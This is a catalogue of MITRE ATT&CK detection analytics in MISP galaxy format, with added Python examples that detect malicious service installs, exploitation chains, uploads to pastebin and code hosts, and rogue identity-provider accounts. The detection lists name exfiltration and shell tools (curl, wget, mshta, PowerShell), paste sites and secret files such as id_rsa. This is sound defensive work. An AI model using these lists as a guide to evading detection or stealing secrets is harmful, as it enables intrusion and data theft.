Processes like git, curl, or python scripts executing commands that package files (tar, gzip) followed by HTTPS uploads to code repository endpoints. Defender view: detect unusual git push activity or scripted HTTPS requests outside normal developer work hours.

Internal MISP references

UUID 8049e0b4-961b-499f-9204-45fa9b7117be which can be used as unique global reference for Analytic 0896 - AN0896 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0896
mitre_platforms ['Linux']

Analytic 0986 - AN0986

Detects malicious containers or pods using names, labels, or namespaces that mimic legitimate workloads; also checks for image layer mismatches and unauthorized resource deployments.

Internal MISP references

UUID c9bdc7a6-ff19-46e9-a534-fa2fd3e0a193 which can be used as unique global reference for Analytic 0986 - AN0986 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0986
mitre_platforms ['Containers']

Analytic 0869 - AN0869

Monitoring for discrepancies between system daemon/service state and reported health messages (e.g., syslog shows AV/IDS daemon stopped, but spoofed messages claim it is still running). Detects userland processes impersonating AV/IDS command-line outputs or modifying log forwarding configurations.

Internal MISP references

UUID d1feb97f-3683-49f5-b5a8-b54d58de3444 which can be used as unique global reference for Analytic 0869 - AN0869 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0869
mitre_platforms ['Linux']

Analytic 0699 - AN0699

Execution of pip.exe, npm.cmd, or MSI installers within user context, followed by script interpreter startup (e.g., python.exe) or PowerShell with unusual child processes or file writes in %APPDATA%, %TEMP%, or %LOCALAPPDATA%. Defender correlates command-line install tools with Sysmon and Event Logs to trace downstream behavior.

Internal MISP references

UUID 05985fc7-44cf-4b28-8d4f-14c1662bc5ea which can be used as unique global reference for Analytic 0699 - AN0699 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0699
mitre_platforms ['Windows']

Analytic 0969 - AN0969

High-volume packet generation by local processes (e.g., PowerShell, cmd, curl.exe) or network service processes resulting in excessive outbound traffic over short time window, correlated with abnormal resource usage or degraded host responsiveness.

Internal MISP references

UUID 0de81d5a-ffba-4eba-915d-c4f4d8b30f9a which can be used as unique global reference for Analytic 0969 - AN0969 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0969
mitre_platforms ['Windows']

Analytic 0996 - AN0996

Monitors execution of older or legacy interpreters (e.g., python2, bash with restricted history logging), downgrade of TLS/SSL configurations, or forced fallback to unencrypted protocols. Detects suspicious reconfiguration of kernel modules or boot loaders to reduce integrity controls.

Internal MISP references

UUID 54eb86ed-2a72-41a8-b060-2750c2fee758 which can be used as unique global reference for Analytic 0996 - AN0996 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0996
mitre_platforms ['Linux']

Analytic 0777 - AN0777

Unexpected firmware image uploads via TFTP/FTP/SCP. Configuration changes modifying boot image pointers. Logs showing boot variable redirection to non-standard images. Anomalous reboots immediately following firmware changes not tied to patch schedules.

Internal MISP references

UUID e64aebfd-8343-45ec-bdce-6681a8255637 which can be used as unique global reference for Analytic 0777 - AN0777 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0777
mitre_platforms ['Network Devices']

Analytic 0877 - AN0877

Detects enabling of interface sniffing via packet capture tools or AppleScript triggering tcpdump. Leverages Unified Logs and process lineage to identify suspicious use of pfctl, tcpdump, or libpcap libraries.

Internal MISP references

UUID 31098e90-e2a0-477f-80ca-e969430d54c2 which can be used as unique global reference for Analytic 0877 - AN0877 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0877
mitre_platforms ['macOS']

Analytic 0787 - AN0787

Unexpected processes (e.g., powershell.exe, wscript.exe, office apps) initiating HTTP POST/PUT requests to text storage domains like pastebin.com or hastebin.com, particularly when preceded by file access in sensitive directories. Defender perspective: correlation of process lineage, large clipboard/file read operations, and outbound uploads to text storage services.

Internal MISP references

UUID 4e8da615-4d12-4b53-8c7b-06d7c41e22a9 which can be used as unique global reference for Analytic 0787 - AN0787 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0787
mitre_platforms ['Windows']

Analytic 0778 - AN0778

Monitor for abnormal creation or modification of Windows services (e.g., via sc.exe, PowerShell, or API calls) that load non-standard executables. Correlate registry changes in service keys with service creation events and process execution to detect service abuse for persistence or execution.

Internal MISP references

UUID 667c21d2-2f92-42d6-aaea-b46974f63c8d which can be used as unique global reference for Analytic 0778 - AN0778 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0778
mitre_platforms ['Windows']
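
A triage routine for the service-creation half of AN0778, added here as an example and not taken from the MITRE analytic or the MISP entry. It takes System log Event ID 7045 ("A service was installed in the system") style records and reports why each looks abusive: a binary outside the trusted install directories, an interpreter (cmd, PowerShell, rundll32, mshta) registered as the service image, an unquoted path containing spaces, arguments pointing at user-writable paths, or a service name used by well-known remote-execution tools. The records, the environment-variable table and the trusted-directory list are the example's own assumptions.

```python
"""Added example for AN0778: triage of System log Event ID 7045 (service installed) records."""
import re

# Constructed 7045-style records; values are illustrative, not captured from a real host.
RECORDS = [
    {"ServiceName": "Sysmon64", "ImagePath": r"C:\Windows\Sysmon64.exe",
     "StartType": "auto start", "AccountName": "LocalSystem"},
    {"ServiceName": "PSEXESVC", "ImagePath": r"%SystemRoot%\PSEXESVC.exe",
     "StartType": "demand start", "AccountName": "LocalSystem"},
    {"ServiceName": "UpdateSvc", "ImagePath": r"%COMSPEC% /Q /c C:\Users\Public\update.bat",
     "StartType": "demand start", "AccountName": "LocalSystem"},
    {"ServiceName": "Backup Agent", "ImagePath": r"C:\Program Files\Backup Agent\agent.exe",
     "StartType": "auto start", "AccountName": "LocalSystem"},
    {"ServiceName": "svc_helper", "ImagePath": r'"C:\Users\Public\helper.exe" -k',
     "StartType": "auto start", "AccountName": "LocalSystem"},
]

ENV = {"%systemroot%": r"C:\Windows", "%windir%": r"C:\Windows",
       "%comspec%": r"C:\Windows\System32\cmd.exe", "%programfiles%": r"C:\Program Files",
       "%programdata%": r"C:\ProgramData", "%temp%": r"C:\Windows\Temp"}
TRUSTED_DIRS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")
WRITABLE_UNDER_TRUSTED = ("c:\\windows\\temp\\", "c:\\windows\\tasks\\")   # writable by non-admins
INTERPRETERS = {"cmd.exe", "powershell.exe", "pwsh.exe", "rundll32.exe", "regsvr32.exe",
                "mshta.exe", "wscript.exe", "cscript.exe"}
REMOTE_EXEC_PREFIXES = ("PSEXESVC", "PAEXEC", "REMCOMSVC", "WINEXESVC", "CSEXECSVC")
PATH_RE = re.compile(r'[a-z]:\\[^\s"]+', re.I)


def expand(path):
    return re.sub(r"%[^%\s]+%", lambda m: ENV.get(m.group(0).lower(), m.group(0)), path)


def binary_of(image_path):
    """Executable portion of an ImagePath: handles quotes, env vars and trailing arguments."""
    p = expand(image_path).strip()
    if p.startswith('"'):
        end = p.find('"', 1)
        return p[1:end] if end > 0 else p[1:]
    m = re.match(r"(.+?\.(?:exe|dll|sys|bat|cmd))(?:\s|$)", p, re.I)
    return m.group(1) if m else p.split(" ")[0]


def trusted(path):
    low = path.lower()
    return low.startswith(TRUSTED_DIRS) and not low.startswith(WRITABLE_UNDER_TRUSTED)


def analyze_service(rec):
    """Return the reasons this service looks abusive; an empty list means nothing stood out."""
    reasons = []
    raw = rec["ImagePath"]
    binary = binary_of(raw)
    name = binary.rsplit("\\", 1)[-1].lower()
    if rec["ServiceName"].upper().startswith(REMOTE_EXEC_PREFIXES):
        reasons.append("known_remote_exec_service")
    if name in INTERPRETERS:
        reasons.append("interpreter_as_service_binary")
    if not trusted(binary):
        reasons.append("binary_outside_trusted_dirs")
    if not raw.lstrip().startswith('"') and " " in binary:
        reasons.append("unquoted_path_with_spaces")     # search-order abuse, see AN1211
    args = expand(raw).replace(binary, "", 1)
    if any(not trusted(p) for p in PATH_RE.findall(args)):
        reasons.append("arguments_reference_untrusted_path")
    return reasons


def detect(records):
    flagged = []
    for rec in records:
        reasons = analyze_service(rec)
        if reasons:
            flagged.append((rec["ServiceName"], reasons))
    return flagged


if __name__ == "__main__":
    for name, reasons in detect(RECORDS):
        print(name, reasons)
```

The same checks apply to the registry side the analytic mentions: a write to HKLM\SYSTEM\CurrentControlSet\Services\<name>\ImagePath that changes an existing service's binary produces no 7045 event, so the ImagePath value from the registry-modification event should be run through analyze_service as well.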

Analytic 0797 - AN0797

Cause→effect chain: (1) A client app (browser, Office, PDF/Flash/reader) experiences a crash/abnormal exit or loads from an unusual location, then (2) drops or modifies a file in user-writable paths, and/or (3) spawns an unexpected child (e.g., powershell/cmd/mshta/rundll32/wscript/installer), and (4) establishes outbound C2-like connections shortly after. Correlate application logs, file writes, process lineage, and network egress within a short window.

Internal MISP references

UUID 065f2c96-6903-4cd1-a737-99ecf1fdc73e which can be used as unique global reference for Analytic 0797 - AN0797 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0797
mitre_platforms ['Windows']

Analytic 0779 - AN0779

Detect unusual invocations of systemctl, service, or init scripts creating or modifying daemons. Monitor audit logs for execution of binaries from unexpected paths linked to service start/stop activity.

Internal MISP references

UUID 65691cb3-a2b3-4c48-91d2-7088a047ebef which can be used as unique global reference for Analytic 0779 - AN0779 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0779
mitre_platforms ['Linux']

Analytic 0977 - AN0977

Detect execution of /usr/libexec/security_authtrampoline or use of AuthorizationExecuteWithPrivileges API, and monitor process lineage for unusual launches of GUI apps with escalated privileges.

Internal MISP references

UUID d8b422b3-50e7-48cc-bfa1-a6e0cecf5761 which can be used as unique global reference for Analytic 0977 - AN0977 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0977
mitre_platforms ['macOS']

Analytic 0887 - AN0887

Execution of commands that stop or kill processes associated with logging or security daemons (auditd, syslog, Falco). Detect modifications to iptables or disabling SELinux/AppArmor enforcement. Correlate sudo/root context with abrupt service halts.

Internal MISP references

UUID 003dd2ae-b156-4ebd-8a59-76f993056552 which can be used as unique global reference for Analytic 0887 - AN0887 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0887
mitre_platforms ['Linux']

Analytic 0878 - AN0878

Detects creation of traffic mirroring sessions (e.g., AWS VPC Traffic Mirroring, Azure vTAP) that redirect traffic from critical assets to other virtual instances, often followed by file creation or session establishment.

Internal MISP references

UUID 4c4941eb-b087-4710-8c88-ff537c2309ff which can be used as unique global reference for Analytic 0878 - AN0878 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0878
mitre_platforms ['IaaS']

Analytic 0788 - AN0788

Use of curl, wget, or custom scripts to POST data to pastebin-like services. Defender perspective: identify chained behavior where files are compressed/read followed by HTTPS POST requests to text-sharing endpoints.

Internal MISP references

UUID dd202a3f-c73b-47cf-9689-f14a8def816e which can be used as unique global reference for Analytic 0788 - AN0788 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0788
mitre_platforms ['Linux']

Analytic 0879 - AN0879

Detects execution of capture commands via CLI (monitor capture, debug packet, etc.) or unauthorized CLI access followed by logging configuration changes on Cisco/Juniper/Arista gear.

Internal MISP references

UUID 25403649-ce66-4fb0-9957-8c319b10e9d7 which can be used as unique global reference for Analytic 0879 - AN0879 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0879
mitre_platforms ['Network Devices']

Analytic 0978 - AN0978

Monitor for unexpected privilege elevation operations via SAML assertion manipulation, role injection, or changes to identity mappings that result in access escalation.

Internal MISP references

UUID 6385ccc0-f1a9-4198-997e-dec943e88db7 which can be used as unique global reference for Analytic 0978 - AN0978 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0978
mitre_platforms ['Identity Provider']

Analytic 0897 - AN0897

Office or scripting applications initiating unusual HTTPS traffic to code repository APIs with high outbound-to-inbound ratios. Defender perspective: monitor for sensitive file access in combination with network connections to github.com, gitlab.com, or bitbucket.org.

Internal MISP references

UUID 70b2ab8e-f18e-4cb5-8149-4ba2c334df69 which can be used as unique global reference for Analytic 0897 - AN0897 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0897
mitre_platforms ['macOS']

Analytic 0798 - AN0798

Cause→effect chain: (1) Browser/Office/reader process logs crash/segfault or abnormal sandbox message, (2) new executable/script/write occurs in $HOME (Downloads, ~/.cache, /tmp), (3) unexpected child like curl/wget/bash/python opens network connections soon after.

Internal MISP references

UUID b3b58ac5-6b60-4c34-9842-46f5ee517bcb which can be used as unique global reference for Analytic 0798 - AN0798 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0798
mitre_platforms ['Linux']

Analytic 0789 - AN0789

Processes such as osascript, curl, or office applications sending data to text storage APIs/domains. Defender perspective: anomalous clipboard or file reads by unexpected applications immediately followed by outbound HTTPS requests to pastebin-like services.

Internal MISP references

UUID cf74f802-0080-41ff-8745-9c42af313462 which can be used as unique global reference for Analytic 0789 - AN0789 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0789
mitre_platforms ['macOS']

Analytic 0987 - AN0987

Detects VIBs, scripts, or binaries placed into directories like /bin or /etc/vmware with names mimicking standard ESXi components. Also monitors unauthorized creation of services.

Internal MISP references

UUID d16be21c-6df4-4648-91cd-36152dafa38d which can be used as unique global reference for Analytic 0987 - AN0987 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0987
mitre_platforms ['ESXi']

Analytic 0997 - AN0997

Detection of execution of legacy scripting runtimes (e.g., older versions of Python, Bash, or PowerShell Core) lacking auditing. Monitoring for changes to EFI or system boot files indicative of downgrade-based persistence or bypass of integrity features.

Internal MISP references

UUID 08a391a7-1ce6-4f11-b060-fca06ef03328 which can be used as unique global reference for Analytic 0997 - AN0997 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0997
mitre_platforms ['macOS']

Analytic 0799 - AN0799

Cause→effect chain: (1) App crash/abnormal termination in unified logs for Safari/Chrome/Office/Preview, (2) new files/scripts in ~/Library, ~/Downloads, /private/var/folders/*, (3) unexpected child (osascript, zsh, bash, curl) spawned by those apps, (4) new outbound connections.

Internal MISP references

UUID 4aaf0a98-c6a9-4b30-a9d9-3a014473bd0e which can be used as unique global reference for Analytic 0799 - AN0799 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0799
mitre_platforms ['macOS']
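
The four-stage cause→effect chain is the same on all three platforms (AN0797 for Windows, AN0798 for Linux, AN0799 for macOS), so one added example covers them; it is not part of the MITRE analytics or the MISP entries. The correlator tracks state per client-application process: a crash and a write into a user-writable path are recorded against the application, a suspicious child is attached to it, and outbound traffic from that child completes the chain. Spawn and egress are mandatory; crash and file write raise the score. The normalised events, their field names and the application and child lists are constructed for the example.

```python
"""Added example for AN0797/AN0798/AN0799: stateful correlation of the crash -> file write ->
child spawn -> network chain, keyed on the client application's pid."""

# Constructed, normalised host events (epoch seconds). 'crash' stands in for an Application log
# 1000/1001 record, a dmesg segfault line, or a unified-log crash report.
EVENTS = [
    {"ts": 100, "host": "w1", "kind": "crash", "pid": 4000,
     "image": r"C:\Program Files\Adobe\Reader\AcroRd32.exe"},
    {"ts": 102, "host": "w1", "kind": "file_write", "pid": 4000,
     "image": r"C:\Program Files\Adobe\Reader\AcroRd32.exe", "path": r"C:\Users\bob\AppData\Local\Temp\inv.hta"},
    {"ts": 103, "host": "w1", "kind": "process", "pid": 4100, "ppid": 4000, "image": r"C:\Windows\System32\mshta.exe"},
    {"ts": 105, "host": "w1", "kind": "network", "pid": 4100, "image": r"C:\Windows\System32\mshta.exe",
     "dst": "203.0.113.10:443"},
    {"ts": 200, "host": "l1", "kind": "crash", "pid": 800, "image": "/usr/bin/evince"},
    {"ts": 201, "host": "l1", "kind": "process", "pid": 810, "ppid": 800, "image": "/bin/bash"},
    {"ts": 202, "host": "l1", "kind": "network", "pid": 810, "image": "/bin/bash", "dst": "198.51.100.20:8443"},
    {"ts": 300, "host": "m1", "kind": "file_write", "pid": 500,
     "image": "/Applications/Preview.app/Contents/MacOS/Preview", "path": "/Users/alice/Downloads/report.pdf"},
    {"ts": 400, "host": "w1", "kind": "process", "pid": 5100, "ppid": 5000,
     "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe"},
]

CLIENT_APPS = {"acrord32.exe", "winword.exe", "excel.exe", "chrome.exe", "firefox.exe", "msedge.exe",
               "evince", "firefox", "chrome", "soffice.bin", "safari", "preview", "microsoft word"}
SUSPICIOUS_CHILDREN = {"powershell.exe", "cmd.exe", "mshta.exe", "rundll32.exe", "wscript.exe", "cscript.exe",
                       "msiexec.exe", "bash", "sh", "zsh", "curl", "wget", "python", "python3", "osascript"}
USER_WRITABLE = ("c:\\users\\", "/home/", "/tmp/", "/var/tmp/", "/users/", "/private/var/folders/")
WINDOW = 300  # seconds allowed between consecutive stages


def basename(path):
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def correlate_chains(events, window=WINDOW):
    chains = {}                                   # (host, app_pid) -> stage state
    for e in sorted(events, key=lambda x: x["ts"]):
        key = (e["host"], e["pid"])
        if basename(e["image"]) in CLIENT_APPS:   # stages 1-2 belong to the client app itself
            c = chains.setdefault(key, {"app": basename(e["image"]), "crash": None,
                                        "writes": [], "children": {}, "net": []})
            if e["kind"] == "crash":
                c["crash"] = e["ts"]
            elif e["kind"] == "file_write" and e["path"].lower().startswith(USER_WRITABLE):
                c["writes"].append(e["path"])
        if e["kind"] == "process":                # stage 3: suspicious child of a tracked app
            c = chains.get((e["host"], e.get("ppid")))
            if c and basename(e["image"]) in SUSPICIOUS_CHILDREN:
                if c["crash"] is None or e["ts"] - c["crash"] <= window:
                    c["children"][e["pid"]] = (basename(e["image"]), e["ts"])
        if e["kind"] == "network":                # stage 4: that child talks out
            for (host, _), c in chains.items():
                child = c["children"].get(e["pid"]) if host == e["host"] else None
                if child and e["ts"] - child[1] <= window:
                    c["net"].append((child[0], e["dst"]))
    alerts = []
    for (host, pid), c in chains.items():
        if not c["children"] or not c["net"]:
            continue                              # spawn + egress are the mandatory stages
        stages = 2 + (c["crash"] is not None) + bool(c["writes"])
        alerts.append({"host": host, "app": c["app"], "app_pid": pid, "stages": stages,
                       "crash": c["crash"], "writes": c["writes"], "egress": c["net"],
                       "severity": "high" if stages == 4 else "medium"})
    return alerts


if __name__ == "__main__":
    for alert in correlate_chains(EVENTS):
        print(alert)
```

Keying on (host, pid) is the weak point in production, since pids are reused; real telemetry should key on the sensor's process GUID and the window should be short enough that a reused pid cannot inherit an earlier crash. The Preview write on m1 shows the intended negative case: a file landing in Downloads with no child and no egress is just a user saving a document.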

Analytic 0979 - AN0979

Detect sudden privilege escalations such as IAM role changes, user-assigned privilege boundaries, or elevation via assumed roles beyond normal behavior.

Internal MISP references

UUID 9465ea54-a81a-4d00-a75d-e0b7f3392bb8 which can be used as unique global reference for Analytic 0979 - AN0979 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0979
mitre_platforms ['IaaS']

Analytic 0888 - AN0888

Execution of commands or APIs that disable Gatekeeper, XProtect, or system integrity protections. Detect configuration changes through unified logs. Monitor termination of system security daemons (e.g., syspolicyd).

Internal MISP references

UUID fb51dd4c-b751-4282-a447-d9f5f257b435 which can be used as unique global reference for Analytic 0888 - AN0888 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0888
mitre_platforms ['macOS']

Analytic 0988 - AN0988

Identifies suspicious outbound traffic volume mismatches from processes that typically do not generate network activity, particularly over C2 protocols like HTTPS, DNS, or custom TCP/UDP ports, following file or data access.

Internal MISP references

UUID 28c16139-9ce1-4dd7-b26a-e257f37e246c which can be used as unique global reference for Analytic 0988 - AN0988 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0988
mitre_platforms ['Windows']

Analytic 0889 - AN0889

Modification of container runtime security profiles (AppArmor, seccomp) or removal of monitoring agents within containers. Detect unauthorized mounting/unmounting of host /proc or /sys to disable logging or auditing.

Internal MISP references

UUID 2a4f23d7-3f80-45b7-90ec-b13fdd7f8d70 which can be used as unique global reference for Analytic 0889 - AN0889 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0889
mitre_platforms ['Containers']

Analytic 0898 - AN0898

ESXi host processes (vmx, hostd) initiating HTTPS sessions toward external code repositories. Defender perspective: detect datastore reads followed by outbound web traffic inconsistent with administrative baselines.

Internal MISP references

UUID e18f0682-6610-4ba8-8159-a4afea3b7974 which can be used as unique global reference for Analytic 0898 - AN0898 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0898
mitre_platforms ['ESXi']
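
AN0787 through AN0789 (text-storage sites) and AN0896 through AN0898 (code-hosting services) describe the same shape of detection on different platforms: an unexpected process, an upload-heavy byte ratio, a preceding read of something sensitive, and for git specifically a push at an odd hour. The following is an added example covering all six, not part of the MITRE analytics or the MISP entries. The per-connection flow summaries and the file reads attached to them are constructed; the domain lists, the expected-client set, the working-hours range and the ratio threshold are the example's own choices.

```python
"""Added example for AN0787-AN0789 and AN0896-AN0898: flag uploads to text-storage and
code-hosting services by processes that should not be talking to them."""
from datetime import datetime

# Constructed per-process flow summaries (bytes per direction over one connection) plus the
# sensitive paths each process read shortly before. Not real traffic.
FLOWS = [
    {"ts": "2024-05-01T10:12:00", "host": "w1", "process": "chrome.exe", "domain": "github.com",
     "bytes_out": 2_000, "bytes_in": 410_000, "reads": []},
    {"ts": "2024-05-01T14:30:00", "host": "l1", "process": "git", "domain": "github.com",
     "bytes_out": 5_200_000, "bytes_in": 12_000, "reads": []},
    {"ts": "2024-05-01T02:15:00", "host": "l1", "process": "git", "domain": "github.com",
     "bytes_out": 48_000_000, "bytes_in": 9_000, "reads": []},
    {"ts": "2024-05-01T11:05:00", "host": "w1", "process": "powershell.exe", "domain": "pastebin.com",
     "bytes_out": 300_000, "bytes_in": 2_100, "reads": [r"C:\Users\bob\Documents\passwords.xlsx"]},
    {"ts": "2024-05-01T11:40:00", "host": "m1", "process": "osascript", "domain": "hastebin.com",
     "bytes_out": 50_000, "bytes_in": 900, "reads": []},
    {"ts": "2024-05-01T12:00:00", "host": "esx1", "process": "vmx", "domain": "gitlab.com",
     "bytes_out": 20_000_000, "bytes_in": 15_000, "reads": ["/vmfs/volumes/ds1/dc01/dc01-flat.vmdk"]},
]

TEXT_STORAGE = {"pastebin.com", "hastebin.com", "paste.ee", "ghostbin.com", "rentry.co"}
CODE_HOSTS = {"github.com", "api.github.com", "gitlab.com", "bitbucket.org"}
# Processes for which a session with these services is ordinary.
EXPECTED_CLIENTS = {"chrome.exe", "msedge.exe", "firefox.exe", "chrome", "firefox", "safari",
                    "git", "git-remote-https", "code.exe", "code", "gh"}
WORK_HOURS = range(7, 20)          # local hours in which interactive developer pushes are expected
UPLOAD_RATIO = 10.0                # bytes_out / bytes_in above this looks like an upload, not browsing
SENSITIVE_HINTS = ("password", "secret", ".kdbx", ".pem", "id_rsa", ".vmdk", ".xlsx")


def classify(flow):
    """Return a list of reasons; an empty list means the flow is unremarkable."""
    domain = flow["domain"].lower()
    if domain not in TEXT_STORAGE and domain not in CODE_HOSTS:
        return []
    reasons = []
    ratio = flow["bytes_out"] / max(flow["bytes_in"], 1)
    hour = datetime.fromisoformat(flow["ts"]).hour
    proc = flow["process"].lower()
    if proc not in EXPECTED_CLIENTS:
        reasons.append("unexpected_process")
    if ratio >= UPLOAD_RATIO:
        reasons.append("upload_ratio")
    if proc == "git" and hour not in WORK_HOURS and ratio >= UPLOAD_RATIO:
        reasons.append("push_outside_work_hours")
    if any(hint in path.lower() for path in flow["reads"] for hint in SENSITIVE_HINTS):
        reasons.append("sensitive_read_before_upload")
    # An expected client uploading during work hours is a developer pushing code: stay silent.
    if reasons == ["upload_ratio"] and proc in EXPECTED_CLIENTS and hour in WORK_HOURS:
        return []
    return reasons


def detect(flows):
    alerts = []
    for flow in flows:
        reasons = classify(flow)
        if reasons:
            high = "sensitive_read_before_upload" in reasons or "unexpected_process" in reasons
            alerts.append({"host": flow["host"], "process": flow["process"], "domain": flow["domain"],
                           "reasons": reasons, "severity": "high" if high else "medium"})
    return alerts


if __name__ == "__main__":
    for alert in detect(FLOWS):
        print(alert)
```

On hosts where TLS is not inspected the domain comes from SNI or DNS rather than the HTTP request, and the byte counts come from the flow record rather than from a decoded POST, so the rule works on the proxy or NetFlow side as well as on endpoint telemetry; the vmx case is the ESXi variant, where no process on the hypervisor should ever reach a code host.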

Analytic 0899 - AN0899

Adversaries create user accounts via identity provider APIs or admin portals (e.g., Azure AD, Okta). These accounts may be assigned elevated privileges or used in chained authentication. Detection monitors Add User activity from suspicious IPs or automation sources, followed by role/permission escalation.

Internal MISP references

UUID 668f1c2b-1a5e-4269-92d9-f7126764dd4e which can be used as unique global reference for Analytic 0899 - AN0899 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0899
mitre_platforms ['Identity Provider']
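
The AN0899 sequence, written out as an added example (not part of the MITRE analytic or the MISP entry): every user-creation event is scored on where it came from (an API token rather than the portal, a source address outside the administrative networks), then the following hour of audit events is searched for a privileged role landing on the new account or for the new account itself changing someone's privileges. The audit events use the example's own normalised field names rather than the Okta or Entra ID schema, and the trusted network, privileged-role list and window are assumptions.

```python
"""Added example for AN0899: account creation followed by privilege changes within a window."""
import ipaddress
from datetime import datetime, timedelta

# Constructed, normalised IdP audit events (field names are this example's own, not a vendor schema).
AUDIT = [
    {"ts": "2024-05-01T09:00:00", "actor": "admin@corp.example", "ip": "10.0.0.5", "source": "portal",
     "action": "user.create", "target": "jdoe@corp.example"},
    {"ts": "2024-05-01T09:01:00", "actor": "admin@corp.example", "ip": "10.0.0.5", "source": "portal",
     "action": "group.add", "target": "jdoe@corp.example", "role": "Sales"},
    {"ts": "2024-05-01T23:10:00", "actor": "token:hr-sync", "ip": "198.51.100.7", "source": "api",
     "action": "user.create", "target": "svc-backup2@corp.example"},
    {"ts": "2024-05-01T23:10:30", "actor": "token:hr-sync", "ip": "198.51.100.7", "source": "api",
     "action": "role.assign", "target": "svc-backup2@corp.example", "role": "Global Administrator"},
    {"ts": "2024-05-02T03:00:00", "actor": "admin@corp.example", "ip": "203.0.113.9", "source": "portal",
     "action": "user.create", "target": "helpdesk9@corp.example"},
    {"ts": "2024-05-02T03:04:00", "actor": "helpdesk9@corp.example", "ip": "203.0.113.9", "source": "portal",
     "action": "role.assign", "target": "ops@corp.example", "role": "User Administrator"},
]

TRUSTED_ADMIN_NETS = [ipaddress.ip_network("10.0.0.0/8")]
PRIVILEGED_ROLES = {"Global Administrator", "Privileged Role Administrator", "User Administrator",
                    "Super Administrator", "Organization Administrator"}
PRIVILEGE_ACTIONS = {"role.assign", "group.add"}
WINDOW = timedelta(hours=1)


def ts(event):
    return datetime.fromisoformat(event["ts"])


def from_trusted_net(ip):
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in TRUSTED_ADMIN_NETS)


def detect(events):
    events = sorted(events, key=ts)
    alerts = []
    for i, create in enumerate(events):
        if create["action"] != "user.create":
            continue
        new_user = create["target"]
        creation_reasons = []
        if create["source"] == "api":
            creation_reasons.append("created_by_automation")
        if not from_trusted_net(create["ip"]):
            creation_reasons.append("created_from_untrusted_ip")
        follow_on = []
        for later in events[i + 1:]:
            if ts(later) - ts(create) > WINDOW:
                break                                   # events are sorted, nothing later qualifies
            if later["action"] not in PRIVILEGE_ACTIONS:
                continue
            if later["target"] == new_user and later.get("role") in PRIVILEGED_ROLES:
                follow_on.append(f"privileged_role_granted:{later['role']}")
            if later["actor"] == new_user:              # chained use of the fresh account
                follow_on.append(f"new_account_changed_privileges:{later['target']}")
        if follow_on:
            alerts.append({"user": new_user, "created_by": create["actor"], "ip": create["ip"],
                           "reasons": creation_reasons + follow_on,
                           "severity": "high" if creation_reasons else "medium"})
    return alerts


if __name__ == "__main__":
    for alert in detect(AUDIT):
        print(alert)
```

Legitimate provisioning pipelines also create accounts from API tokens, so the creation-side reasons alone never alert; only the follow-on privilege change inside the window does, with the creation context deciding the severity. The jdoe events are the expected negative case: a portal-created user added to an ordinary group.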

Analytic 0989 - AN0989

Monitors for processes reading sensitive files then immediately initiating unusual outbound connections or bulk transfer sessions over persistent sockets, particularly with encrypted or binary payloads.

Internal MISP references

UUID 6914dd62-46a6-4de4-9c0b-afe1cb5b075d which can be used as unique global reference for Analytic 0989 - AN0989 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0989
mitre_platforms ['Linux']

Analytic 0998 - AN0998

Linux permission escalation behavioral chain: (1) Process creation of permission modification utilities (chmod, chown, chgrp, setfacl) with suspicious parameters indicating privilege escalation intent, (2) System call analysis revealing direct file metadata manipulation (chmod, fchmod, chown, fchown syscalls), (3) Extended attribute and ACL modifications targeting critical system paths, (4) Temporal correlation with subsequent file access or process execution from modified locations, (5) Anomalous permission patterns deviating from system baselines

Internal MISP references

UUID 971ddd36-1ecd-46bf-b94c-22e8f05c1462 which can be used as unique global reference for Analytic 0998 - AN0998 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0998
mitre_platforms ['Linux']
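
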